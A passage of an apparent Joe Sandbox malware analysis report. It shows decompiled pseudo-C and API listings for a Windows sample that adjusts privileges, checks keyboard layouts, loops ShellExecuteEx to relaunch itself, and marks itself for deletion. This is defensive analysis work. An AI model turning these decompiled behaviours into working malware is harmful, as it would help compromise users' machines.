							 *((intOrPtr*)( *_t86 + 8))(_t86);
							_t88 = _v24;
							 *((intOrPtr*)( *_t88 + 8))(_t88);
							_t115 =  *0x9d0260; // 0x9d024c
							 *((intOrPtr*)(_t115 + 8))(0x9d0260);
							_t116 = _v16;
							 *((intOrPtr*)( *_t116 + 8))(_t116);
							 *0x9d1074();
							_t93 = _t132;
						} else {
							_t94 = _v12;
							 *((intOrPtr*)( *_t94 + 8))(_t94);
							 *0x9d1074();
							_t93 = 1;
						}
					} else {
						 *0x9d1074();
						_t93 = 1;
					}
					return _t93;
				}
				return 1;
			}








































                                                                                                                                                            0x009c3997
                                                                                                                                                            0x009c399f
                                                                                                                                                            0x009c39b5
                                                                                                                                                            0x009c39be
                                                                                                                                                            0x009c39d1
                                                                                                                                                            0x009c39d9
                                                                                                                                                            0x009c39ec
                                                                                                                                                            0x009c39fe
                                                                                                                                                            0x009c3a08
                                                                                                                                                            0x009c3a10
                                                                                                                                                            0x009c3a16
                                                                                                                                                            0x009c3a19
                                                                                                                                                            0x009c3a29
                                                                                                                                                            0x009c3a2f
                                                                                                                                                            0x009c3a37
                                                                                                                                                            0x009c3a62
                                                                                                                                                            0x009c3a65
                                                                                                                                                            0x009c3a6b
                                                                                                                                                            0x009c3a76
                                                                                                                                                            0x009c3a79
                                                                                                                                                            0x009c3a80
                                                                                                                                                            0x009c3a87
                                                                                                                                                            0x009c3a8a
                                                                                                                                                            0x009c3a91
                                                                                                                                                            0x009c3a9c
                                                                                                                                                            0x009c3ab1
                                                                                                                                                            0x009c3ab8
                                                                                                                                                            0x009c3ad0
                                                                                                                                                            0x009c3ada
                                                                                                                                                            0x009c3ae8
                                                                                                                                                            0x009c3af1
                                                                                                                                                            0x009c3afa
                                                                                                                                                            0x009c3afd
                                                                                                                                                            0x009c3b0a
                                                                                                                                                            0x009c3b10
                                                                                                                                                            0x009c3b17
                                                                                                                                                            0x009c3b1f
                                                                                                                                                            0x009c3b2e
                                                                                                                                                            0x009c3b34
                                                                                                                                                            0x009c3b3d
                                                                                                                                                            0x009c3b40
                                                                                                                                                            0x009c3b21
                                                                                                                                                            0x009c3b23
                                                                                                                                                            0x009c3b23
                                                                                                                                                            0x009c3b42
                                                                                                                                                            0x009c3b48
                                                                                                                                                            0x009c3b4b
                                                                                                                                                            0x009c3b51
                                                                                                                                                            0x009c3b54
                                                                                                                                                            0x009c3b5a
                                                                                                                                                            0x009c3b5d
                                                                                                                                                            0x009c3b63
                                                                                                                                                            0x009c3b66
                                                                                                                                                            0x009c3b71
                                                                                                                                                            0x009c3b74
                                                                                                                                                            0x009c3b7a
                                                                                                                                                            0x009c3b7d
                                                                                                                                                            0x009c3b83
                                                                                                                                                            0x009c3a39
                                                                                                                                                            0x009c3a39
                                                                                                                                                            0x009c3a3f
                                                                                                                                                            0x009c3a42
                                                                                                                                                            0x009c3a48
                                                                                                                                                            0x009c3a48
                                                                                                                                                            0x009c39db
                                                                                                                                                            0x009c39db
                                                                                                                                                            0x009c39e1
                                                                                                                                                            0x009c39e1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3b86
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6608ec5fa77d06564de8c2458915e1f87f77828afbf0c031ec9577d8c6b6e775
                                                                                                                                                            • Instruction ID: 0caa997252030d82d0fecff84b8e686eb86e4d2ae056c3f040d6443f4dddea68
                                                                                                                                                            • Opcode Fuzzy Hash: 6608ec5fa77d06564de8c2458915e1f87f77828afbf0c031ec9577d8c6b6e775
                                                                                                                                                            • Instruction Fuzzy Hash: DC61AF75A45218BFD710DBA0CC88EAFBBBCEF49754F108259F606E7250CA309E41CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C37C6, Relevance: 10.6, APIs: 7, Instructions: 86threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E009C37C6(void* __ebx, void* __eflags) {
				char _v8;
				void* __ecx;
				void* __edi;
				void* _t8;
				WCHAR* _t12;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;
				void* _t32;
				WCHAR* _t33;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t42;

				_t22 = __ebx;
				SetPriorityClass(GetCurrentProcess(), 0x8000); // executed
				 *0x9d118c(_t29, _t32, _t23);
				E009C2B9C(_t29);
				E009C532C(_t23, 0x14); // executed
				_t24 = 0x80000001;
				_t38 =  *0x9d22b0; // 0x1
				if(_t38 != 0) {
					_t16 = CreateThread(0, 0, E009C3989, 0, 0, 0); // executed
					E009C4B21(_t16); // executed
					E009C3B8E(); // executed
					 *_t35 = E009C2C56;
					_push(0);
					_push(0); // executed
					E009C53A4(); // executed
					_t35 = _t35 + 0xc;
					_t20 = CreateThread(0, 0, E009C291D, 0, 0, 0); // executed
					E009C4B21(_t20);
					_pop(_t24);
				}
				E009C532C(_t24, 9); // executed
				_pop(_t25); // executed
				_t8 = E009C32DE(); // executed
				if(_t8 != 0) {
					_t40 =  *0x9d22ac; // 0x0
					if(_t40 == 0) {
						E009C453E();
						_t41 =  *0x9d22ac; // 0x0
						if(_t41 == 0) {
							_t42 =  *0x9d2290; // 0x1
							if(_t42 != 0) {
								E009C5E04(_t25, _t42,  *0x9d21f8, 0x3b, 0, E009C2C7D);
							}
						}
					}
				}
				 *0x9d118c(0x80000000);
				E009C1412(_t22);
				_t12 = E009C4EC6(0,  &_v8);
				_t33 = _t12;
				if(_t33 != 0) {
					MoveFileExW(_t33, 0, 4);
					_t12 = E009C47F8(_t33);
				}
				return _t12;
			}






















                                                                                                                                                            0x009c37c6
                                                                                                                                                            0x009c37d7
                                                                                                                                                            0x009c37e2
                                                                                                                                                            0x009c37e8
                                                                                                                                                            0x009c37ef
                                                                                                                                                            0x009c37f6
                                                                                                                                                            0x009c37f7
                                                                                                                                                            0x009c37fd
                                                                                                                                                            0x009c3809
                                                                                                                                                            0x009c3810
                                                                                                                                                            0x009c3815
                                                                                                                                                            0x009c381a
                                                                                                                                                            0x009c3821
                                                                                                                                                            0x009c3822
                                                                                                                                                            0x009c3823
                                                                                                                                                            0x009c3828
                                                                                                                                                            0x009c3835
                                                                                                                                                            0x009c383c
                                                                                                                                                            0x009c3841
                                                                                                                                                            0x009c3841
                                                                                                                                                            0x009c3844
                                                                                                                                                            0x009c3849
                                                                                                                                                            0x009c384a
                                                                                                                                                            0x009c3851
                                                                                                                                                            0x009c3853
                                                                                                                                                            0x009c3859
                                                                                                                                                            0x009c385b
                                                                                                                                                            0x009c3860
                                                                                                                                                            0x009c3866
                                                                                                                                                            0x009c3868
                                                                                                                                                            0x009c386e
                                                                                                                                                            0x009c387e
                                                                                                                                                            0x009c3883
                                                                                                                                                            0x009c386e
                                                                                                                                                            0x009c3866
                                                                                                                                                            0x009c3859
                                                                                                                                                            0x009c388b
                                                                                                                                                            0x009c3891
                                                                                                                                                            0x009c389b
                                                                                                                                                            0x009c38a0
                                                                                                                                                            0x009c38a6
                                                                                                                                                            0x009c38ac
                                                                                                                                                            0x009c38b3
                                                                                                                                                            0x009c38b8
                                                                                                                                                            0x009c38be

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00008000,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C37D1
                                                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00008000,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C37D7
                                                                                                                                                            • SetThreadExecutionState.KERNEL32(80000001), ref: 009C37E2
                                                                                                                                                              • Part of subcall function 009C532C: RtlAdjustPrivilege.NTDLL(?,00000001,00000001,?), ref: 009C533F
                                                                                                                                                              • Part of subcall function 009C532C: RtlAdjustPrivilege.NTDLL(?,00000001,00000000,00000000), ref: 009C535B
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,009C3989,00000000,00000000,00000000), ref: 009C3809
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                              • Part of subcall function 009C3B8E: OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000), ref: 009C3BA0
                                                                                                                                                              • Part of subcall function 009C53A4: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C53B4
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,009C291D,00000000,00000000,00000000), ref: 009C3835
                                                                                                                                                            • SetThreadExecutionState.KERNEL32(80000000), ref: 009C388B
                                                                                                                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C38AC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Create$AdjustExecutionPrivilegeState$ChangeClassCloseCurrentFileFindManagerMoveNotificationOpenPriorityProcessSnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1033952864-0
                                                                                                                                                            • Opcode ID: 8f626d52d12e2b4db95d293d811a74ad05ca3ab47868bec4990abbe9a4061df4
                                                                                                                                                            • Instruction ID: 4b6d99fb1d9d087a53e4e321dbb8ea2e4a602f3c03746c9651573b2fbb63a329
                                                                                                                                                            • Opcode Fuzzy Hash: 8f626d52d12e2b4db95d293d811a74ad05ca3ab47868bec4990abbe9a4061df4
                                                                                                                                                            • Instruction Fuzzy Hash: 4C21A236D9D640BBD63537A2AC0AF6F3B6CDBC2B51F10811EF704550A2DE615980E673
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C592C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C592C(void* __ebx, void* __edi) {
				char _v8;
				short _v10;
				char _v20;
				struct _SHELLEXECUTEINFOW _v80;
				void* __esi;
				void* _t22;
				void* _t46;
				intOrPtr _t47;

				_t46 = GetCurrentProcess();
				_t22 = E009C5387();
				if(_t22 >= 0x600) {
					_t22 = E009C4CEB(_t46); // executed
					if(_t22 == 3) {
						_t22 = E009C4DF3(_t46, _t46);
						if(_t22 < 0x3000) {
							E009C5628();
							_t47 = E009C4EC6(0,  &_v8);
							if(_t47 != 0) {
								_t45 = E009C5294();
								E009C5DE2(0x9d12d0, 0x5be, 0xa, 0xa,  &_v20);
								_v80.cbSize = 0x3c;
								_v80.fMask = 0;
								_v10 = 0;
								_v80.hwnd = GetForegroundWindow();
								_v80.lpVerb =  &_v20;
								_v80.lpFile = _t47;
								_v80.lpParameters = _t26;
								_v80.lpDirectory = 0;
								_v80.nShow = 1;
								_v80.hInstApp = 0;
								_v80.lpIDList = 0;
								_v80.lpClass = 0;
								_v80.hkeyClass = 0;
								_v80.dwHotKey = 0;
								_v80.hIcon = 0;
								_v80.hProcess = 0;
								do {
								} while (ShellExecuteExW( &_v80) == 0);
								E009C47F8(_t47);
								_t22 = E009C47F8(_t45);
								ExitProcess(0);
							}
							ExitProcess(0);
						}
					}
				}
				return _t22;
			}











                                                                                                                                                            0x009c5939
                                                                                                                                                            0x009c593b
                                                                                                                                                            0x009c5948
                                                                                                                                                            0x009c594f
                                                                                                                                                            0x009c5958
                                                                                                                                                            0x009c595f
                                                                                                                                                            0x009c596a
                                                                                                                                                            0x009c5972
                                                                                                                                                            0x009c5983
                                                                                                                                                            0x009c5989
                                                                                                                                                            0x009c5997
                                                                                                                                                            0x009c59ab
                                                                                                                                                            0x009c59b3
                                                                                                                                                            0x009c59bc
                                                                                                                                                            0x009c59bf
                                                                                                                                                            0x009c59c9
                                                                                                                                                            0x009c59cf
                                                                                                                                                            0x009c59d2
                                                                                                                                                            0x009c59d5
                                                                                                                                                            0x009c59d8
                                                                                                                                                            0x009c59db
                                                                                                                                                            0x009c59e2
                                                                                                                                                            0x009c59e5
                                                                                                                                                            0x009c59e8
                                                                                                                                                            0x009c59eb
                                                                                                                                                            0x009c59ee
                                                                                                                                                            0x009c59f1
                                                                                                                                                            0x009c59f4
                                                                                                                                                            0x009c59f7
                                                                                                                                                            0x009c5a01
                                                                                                                                                            0x009c5a06
                                                                                                                                                            0x009c5a0c
                                                                                                                                                            0x009c5a14
                                                                                                                                                            0x009c5a14
                                                                                                                                                            0x009c598c
                                                                                                                                                            0x009c598c
                                                                                                                                                            0x009c596a
                                                                                                                                                            0x009c5958
                                                                                                                                                            0x009c5a20

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 009C5933
                                                                                                                                                              • Part of subcall function 009C4CEB: OpenProcessToken.ADVAPI32(009C5954,00000008,009C5954,?,009C5954), ref: 009C4CFE
                                                                                                                                                              • Part of subcall function 009C4CEB: GetTokenInformation.KERNELBASE(009C5954,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009C5954), ref: 009C4D17
                                                                                                                                                              • Part of subcall function 009C4DF3: OpenProcessToken.ADVAPI32(009C5964,00000008,00000000), ref: 009C4E05
                                                                                                                                                              • Part of subcall function 009C4DF3: GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),?,0000004C,009C5964), ref: 009C4E1E
                                                                                                                                                              • Part of subcall function 009C4DF3: IsValidSid.ADVAPI32(?,00000000), ref: 009C4E2D
                                                                                                                                                              • Part of subcall function 009C5628: ReleaseMutex.KERNEL32(009C5977), ref: 009C562E
                                                                                                                                                              • Part of subcall function 009C4EC6: GetModuleFileNameW.KERNEL32(?,00000000,00000106,?,?,00000000,?,009C2BBB,00000000,?,00000000), ref: 009C4EEA
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 009C598C
                                                                                                                                                            • GetForegroundWindow.USER32 ref: 009C59C3
                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 009C59FB
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 009C5A14
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
                                                                                                                                                            • String ID: <
                                                                                                                                                            • API String ID: 491521492-4251816714
                                                                                                                                                            • Opcode ID: 5425e3127c41642eeb93f2040a7767bd1395d49c2bc9dfcb812f6b305cdbc917
                                                                                                                                                            • Instruction ID: 35172d59613a9d0ab267dee8b3abb9e1d385dc431327e9288dba5682187b0010
                                                                                                                                                            • Opcode Fuzzy Hash: 5425e3127c41642eeb93f2040a7767bd1395d49c2bc9dfcb812f6b305cdbc917
                                                                                                                                                            • Instruction Fuzzy Hash: 22219CB2D01319ABDB10EFA5D885BEEBBB8FF14310F51012FE405F2241EB3459818B96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6D2B, Relevance: 9.1, APIs: 6, Instructions: 106libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6D2B() {
				char _v6;
				char _v20;
				char _v22;
				char _v36;
				char _v40;
				char _v56;
				char _v59;
				char _v76;
				char _v80;
				char _v100;
				char _v103;
				char _v124;
				intOrPtr _t21;
				_Unknown_base(*)()* _t51;
				char _t54;

				_t54 = 0;
				do {
					_t21 = E009C707D( *((intOrPtr*)(_t54 + 0x9d0fe8))); // executed
					 *((intOrPtr*)(_t54 + 0x9d0fe8)) = _t21;
					_t54 = _t54 + 4;
				} while (_t54 < 0x2e8);
				E009C5DE2(0x9d12d0, 0x98, 6, 0x15,  &_v124);
				_v103 = 0;
				E009C5DE2(0x9d12d0, 0x9d7, 0xd, 0xe,  &_v20);
				_v6 = 0;
				E009C5DE2(0x9d12d0, 0x7b2, 4, 0x14,  &_v100);
				_v80 = 0;
				E009C5DE2(0x9d12d0, 0x803, 8, 0x10,  &_v56);
				_v40 = 0;
				E009C5DE2(0x9d12d0, 0x76b, 0xf, 0xe,  &_v36);
				_v22 = 0;
				E009C5DE2(0x9d12d0, 0x111, 4, 0x11,  &_v76);
				_v59 = 0;
				 *0x9d113c = GetProcAddress(E009C6F9B(),  &_v124);
				 *0x9d1078 = GetProcAddress(E009C6F9B(),  &_v20);
				 *0x9d12bc = GetProcAddress(E009C6F9B(),  &_v100);
				 *0x9d12b4 = GetProcAddress(E009C6F9B(),  &_v56);
				 *0x9d1074 = GetProcAddress(E009C6F9B(),  &_v36);
				_t51 = GetProcAddress(E009C6F9B(),  &_v76);
				 *0x9d1288 = _t51;
				return _t51;
			}


















                                                                                                                                                            0x009c6d35
                                                                                                                                                            0x009c6d37
                                                                                                                                                            0x009c6d3d
                                                                                                                                                            0x009c6d42
                                                                                                                                                            0x009c6d48
                                                                                                                                                            0x009c6d4c
                                                                                                                                                            0x009c6d67
                                                                                                                                                            0x009c6d6f
                                                                                                                                                            0x009c6d7d
                                                                                                                                                            0x009c6d85
                                                                                                                                                            0x009c6d93
                                                                                                                                                            0x009c6d9b
                                                                                                                                                            0x009c6da9
                                                                                                                                                            0x009c6db1
                                                                                                                                                            0x009c6dc2
                                                                                                                                                            0x009c6dca
                                                                                                                                                            0x009c6dd8
                                                                                                                                                            0x009c6de0
                                                                                                                                                            0x009c6df3
                                                                                                                                                            0x009c6e08
                                                                                                                                                            0x009c6e1d
                                                                                                                                                            0x009c6e32
                                                                                                                                                            0x009c6e47
                                                                                                                                                            0x009c6e56
                                                                                                                                                            0x009c6e5d
                                                                                                                                                            0x009c6e66

                                                                                                                                                            APIs
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6DED
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E02
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E17
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E2C
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E41
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E56
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                                            • Opcode ID: ce77466f50ebde70e925e76929fca812d46e216ad6eead28ef0bf5e50cc5f450
                                                                                                                                                            • Instruction ID: 6bceda3e2c9f283dbe2410fdef1ddb1aad80449bb26362ac74a3b4ea4f4a96b0
                                                                                                                                                            • Opcode Fuzzy Hash: ce77466f50ebde70e925e76929fca812d46e216ad6eead28ef0bf5e50cc5f450
                                                                                                                                                            • Instruction Fuzzy Hash: BC31A672D9A348BAEB10EBF0EC4AFDE776CAB45700F00481BF605F7181D67595849B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C41E5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 284 9c41e5-9c41f4 call 9c7f6b call 9c14fd 289 9c420a 284->289 290 9c41f6-9c41fc 284->290 293 9c420c-9c4211 call 9c4bba 289->293 291 9c41fe-9c4205 call 9c513f 290->291 292 9c4212-9c4227 SetErrorMode call 9c5387 290->292 291->292 300 9c4207-9c4208 291->300 301 9c4229-9c422c SHTestTokenMembership 292->301 302 9c4232-9c4238 292->302 293->292 300->293 301->302 303 9c423a-9c4241 call 9c520f 302->303 304 9c4264 call 9c37c6 302->304 309 9c425f call 9c592c 303->309 310 9c4243-9c425d MessageBoxW call 9c4bba 303->310 308 9c4269-9c4271 call 9c7f6a 304->308 309->304 310->304
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E009C41E5(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t2;
				void* _t5;
				void* _t8;
				void* _t13;
				void* _t14;
				void* _t18;
				intOrPtr _t22;
				intOrPtr _t25;

				_t18 = __edi;
				_t14 = __ecx;
				_t13 = __ebx;
				L009C7F6B(); // executed
				_t2 = E009C14FD(); // executed
				if(_t2 == 0) {
					_push(1);
					L5:
					E009C4BBA();
					L6:
					SetErrorMode(1); // executed
					if(E009C5387() >= 0x600) {
						 *0x9d12a4(0, 0x12);
					}
					_t25 =  *0x9d22ac; // 0x0
					if(_t25 == 0) {
						_t8 = E009C520F(); // executed
						_t26 = _t8;
						if(_t8 == 0) {
							E009C592C(_t13, _t18); // executed
						} else {
							MessageBoxW(0, L"ERROR DOUBLE RUN!", L"Err", 0x10);
							E009C4BBA(0);
						}
					}
					_t5 = E009C37C6(_t13, _t26); // executed
					E009C7F6A(_t5);
					return 0;
				}
				_t22 =  *0x9d2294; // 0x0
				if(_t22 != 0 || E009C513F(_t14, _t22) == 0) {
					goto L6;
				} else {
					_push(0);
					goto L5;
				}
			}











                                                                                                                                                            0x009c41e5
                                                                                                                                                            0x009c41e5
                                                                                                                                                            0x009c41e5
                                                                                                                                                            0x009c41e6
                                                                                                                                                            0x009c41eb
                                                                                                                                                            0x009c41f4
                                                                                                                                                            0x009c420a
                                                                                                                                                            0x009c420c
                                                                                                                                                            0x009c420c
                                                                                                                                                            0x009c4212
                                                                                                                                                            0x009c4214
                                                                                                                                                            0x009c4227
                                                                                                                                                            0x009c422c
                                                                                                                                                            0x009c422c
                                                                                                                                                            0x009c4232
                                                                                                                                                            0x009c4238
                                                                                                                                                            0x009c423a
                                                                                                                                                            0x009c423f
                                                                                                                                                            0x009c4241
                                                                                                                                                            0x009c425f
                                                                                                                                                            0x009c4243
                                                                                                                                                            0x009c4250
                                                                                                                                                            0x009c4257
                                                                                                                                                            0x009c425c
                                                                                                                                                            0x009c4241
                                                                                                                                                            0x009c4264
                                                                                                                                                            0x009c4269
                                                                                                                                                            0x009c4271
                                                                                                                                                            0x009c4271
                                                                                                                                                            0x009c41f6
                                                                                                                                                            0x009c41fc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4207
                                                                                                                                                            0x009c4207
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4207

                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,009C427B,00000000), ref: 009C4214
                                                                                                                                                            • SHTestTokenMembership.SHELL32(00000000,00000012), ref: 009C422C
                                                                                                                                                            • MessageBoxW.USER32(00000000,ERROR DOUBLE RUN!,Err,00000010), ref: 009C4250
                                                                                                                                                              • Part of subcall function 009C513F: GetKeyboardLayoutList.USER32(00000000,00000000,0000000A,00000000,009D0270,?,?,009C19F5), ref: 009C5152
                                                                                                                                                              • Part of subcall function 009C513F: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,009C19F5), ref: 009C5172
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: KeyboardLayoutList$ErrorMembershipMessageModeTestToken
                                                                                                                                                            • String ID: ERROR DOUBLE RUN!$Err
                                                                                                                                                            • API String ID: 2039248178-609711702
                                                                                                                                                            • Opcode ID: 7efe9e2ec9c2a67c921caa1c7350914ad0a12e412a595cf070bf3d3f132428f6
                                                                                                                                                            • Instruction ID: 675475a3d7527b4f2b34325894c38e40d5fbac033192b3c162900b12c4ce17b8
                                                                                                                                                            • Opcode Fuzzy Hash: 7efe9e2ec9c2a67c921caa1c7350914ad0a12e412a595cf070bf3d3f132428f6
                                                                                                                                                            • Instruction Fuzzy Hash: B0F04C30FCB512AAD62537B05C17F8E120C1FD5B00F40402EFA71A40C3CE508C81A5B7
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C2799, Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 316 9c2799-9c27a8 317 9c27ae-9c27af 316->317 318 9c290f-9c2915 316->318 319 9c27b0-9c27e6 call 9c5de2 317->319 322 9c27ea-9c27ec 319->322 323 9c27ee-9c27f2 VariantClear 322->323 324 9c27f8-9c282e call 9c5de2 322->324 323->324 328 9c2834-9c2847 324->328 329 9c2903-9c2907 324->329 332 9c284d-9c2887 call 9c5de2 328->332 333 9c28f9-9c28fd VariantClear 328->333 329->319 330 9c290d-9c290e 329->330 330->318 337 9c289e-9c28d7 call 9c5de2 332->337 338 9c2889-9c2898 call 9c2cd2 VariantClear 332->338 333->329 344 9c28ee-9c28f0 337->344 345 9c28d9-9c28e8 StrToIntW VariantClear 337->345 338->337 344->333 346 9c28f2-9c28f8 call 9c41bb 344->346 345->344 346->333
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
